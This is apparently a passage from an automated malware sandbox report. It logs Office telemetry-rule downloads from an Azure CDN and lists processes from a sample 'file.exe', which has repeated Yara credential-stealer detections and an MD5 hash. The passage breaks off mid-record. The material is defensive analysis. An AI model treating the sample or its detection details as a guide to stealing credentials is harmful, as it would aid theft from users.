                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BDBD9126E"
                                                                                                                                                                                                                      x-ms-request-id: 073925de-a01e-0032-2d8c-3a1949000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164225Z-1777c6cb754gc8g6hC1TEB966c00000009w000000000ap58
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:25 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      143192.168.2.74995413.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:24 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:25 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:25 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1405
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BE89A8F82"
                                                                                                                                                                                                                      x-ms-request-id: 9bd4509d-401e-005b-16fa-3a9c0c000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164225Z-r1d97b99577656nchC1TEBk98c000000092000000000qm8t
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:25 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      144192.168.2.74995013.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:24 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:25 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:25 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1415
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BE7C66E85"
                                                                                                                                                                                                                      x-ms-request-id: d5dea27c-d01e-00ad-3c8c-3ae942000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164225Z-1777c6cb754gvvgfhC1TEBz4rg00000009tg00000000w1r4
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:25 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      145192.168.2.74995513.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:25 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:25 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:25 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1368
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BE51CE7B3"
                                                                                                                                                                                                                      x-ms-request-id: bfe6eb71-201e-006e-168c-3abbe3000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164225Z-1777c6cb754whff4hC1TEBcd6c00000008hg000000007ppw
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:25 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      146192.168.2.74996313.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:27 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:27 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:27 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1415
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BDCE9703A"
                                                                                                                                                                                                                      x-ms-request-id: 0092d5d1-d01e-00a1-5b05-3b35b1000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164227Z-1777c6cb754g9zd5hC1TEBfvpw00000009xg00000000qtn4
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:27 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      147192.168.2.74996713.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:27 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:27 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:27 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1370
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BDE62E0AB"
                                                                                                                                                                                                                      x-ms-request-id: e0cb7cf3-901e-005b-5406-3b2005000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164227Z-r1d97b9957789nh9hC1TEBxha8000000094g00000000r37w
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:27 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      148192.168.2.74996513.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:27 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:27 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:27 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1378
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BE584C214"
                                                                                                                                                                                                                      x-ms-request-id: 4ac405f8-001e-002b-168c-3a99f2000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164227Z-1777c6cb754rz2pghC1TEBghen00000009vg0000000011da
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:27 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      149192.168.2.74996613.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:27 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:27 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:27 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1407
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BE687B46A"
                                                                                                                                                                                                                      x-ms-request-id: 4e85307b-101e-007a-398c-3a047e000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164227Z-r1d97b99577656nchC1TEBk98c000000091g00000000stq4
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:27 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                      Start time:11:41:18
                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                      Imagebase:0x140000
                                                                                                                                                                                                                      File size:1'842'688 bytes
                                                                                                                                                                                                                      MD5 hash:FF1C291B46FB3ADA2BDB55BA4C14BCFE
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1408564784.0000000000F63000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1435311387.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1438497350.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1409004952.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1361660637.0000000000F62000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1408596086.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1384947171.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1384897360.0000000000F63000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1435026656.0000000000F63000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1435268441.0000000000F64000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1362364363.0000000000F64000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1386013914.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:5
                                                                                                                                                                                                                      Start time:13:25:34
                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                                      Imagebase:0x7ff6c4390000
                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                                                      Start time:13:25:34
                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
